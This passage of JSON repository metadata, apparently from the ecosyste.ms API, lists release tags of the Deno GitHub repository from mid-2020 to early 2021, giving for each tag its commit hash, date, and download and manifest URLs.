":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3/manifests"},{"name":"v1.7.2","sha":"647f11b3acc2f629a6d77836f5f6ef74ee10c4ce","kind":"commit","published_at":"2021-02-05T19:33:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2/manifests"},{"name":"v1.7.1","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1/manifests"},{"name":"std/0.85.0","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.85.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.85.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.85.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0/manifests"},{"name":"v1.7.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0/manifests"},{"name":"std/0.84.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.84.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.84.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.84.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0/manifests"},{"name":"v1.6.3","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3/manifests"},{"name":"std/0.83.0","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.83.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.83.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.83.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0/manifests"},{"name":"v1.6.2","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2/manifests"},{"name":"std/0.82.0","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.82.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.82.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.82.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0/manifests"},{"name":"v1.6.1","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1/manifests"},{"name":"std/0.81.0","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.81.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.81.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.81.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0/manifests"},{"name":"v1.6.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0/manifests"},{"name":"std/0.80.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.80.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.80.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.80.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0/manifests"},{"name":"v1.5.4","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4/manifests"},{"name":"std/0.79.0","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.79.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.79.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.79.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0/manifests"},{"name":"v1.5.3","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3/manifests"},{"name":"std/0.78.0","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.78.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.78.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.78.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0/manifests"},{"name":"v1.5.2","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2/manifests"},{"name":"std/0.77.0","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.77.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.77.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.77.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0/manifests"},{"name":"v1.5.1","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1/manifests"},{"name":"std/0.76.0","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.76.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.76.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.76.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0/manifests"},{"name":"v1.5.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0/manifests"},{"name":"std/0.75.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.75.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.75.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.75.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0/manifests"},{"name":"v1.4.6","sha":"9e9ec9784a639ef7205e1e303301ee558439b045","kind":"commit","published_at":"2020-10-10T10:30:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6/manifests"},{"name":"v1.4.5","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5/manifests"},{"name":"std/0.74.0","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.74.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.74.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.74.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0/manifests"},{"name":"v1.4.4","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4/manifests"},{"name":"std/0.73.0","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.73.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.73.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.73.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0/manifests"},{"name":"v1.4.3","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3/manifests"},{"name":"std/0.72.0","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.72.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.72.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.72.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0/manifests"},{"name":"v1.4.2","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2/manifests"},{"name":"std/0.71.0","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.71.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.71.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.71.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0/manifests"},{"name":"v1.4.1","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:40:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1/manifests"},{"name":"std/0.70.0","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:38:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.70.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.70.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.70.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0/manifests"},{"name":"v1.4.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0/manifests"},{"name":"std/0.69.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.69.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.69.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.69.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0/manifests"},{"name":"v1.3.3","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3/manifests"},{"name":"std/0.68.0","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.68.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.68.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.68.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0/manifests"},{"name":"v1.3.2","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2/manifests"},{"name":"std/0.67.0","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.67.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.67.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.67.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0/manifests"},{"name":"v1.3.1","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1/manifests"},{"name":"std/0.66.0","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.66.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.66.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.66.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0/manifests"},{"name":"v1.3.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0/manifests"},{"name":"std/0.65.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.65.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.65.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.65.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0/manifests"},{"name":"v1.2.3","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3/manifests"},{"name":"std/0.64.0","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.64.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.64.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.64.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0/manifests"},{"name":"v1.2.2","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2","manifests_url":"https: